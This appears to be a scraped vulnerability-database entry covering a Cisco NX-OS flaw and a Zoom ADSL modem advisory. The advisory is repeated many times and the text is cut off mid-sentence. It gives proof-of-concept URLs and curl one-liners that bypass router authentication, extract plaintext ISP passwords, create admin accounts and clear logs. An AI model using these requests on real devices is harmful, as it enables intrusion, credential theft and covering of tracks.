VARIoT IoT vulnerabilities database

The license-installation module in Cisco NX-OS on Nexus 1000V devices allows local users to execute arbitrary commands via crafted "install license" arguments, aka Bug ID CSCuh30824. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. Successful exploits may compromise the affected computer. This issue being tracked by Cisco Bug ID CSCuh30824

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can 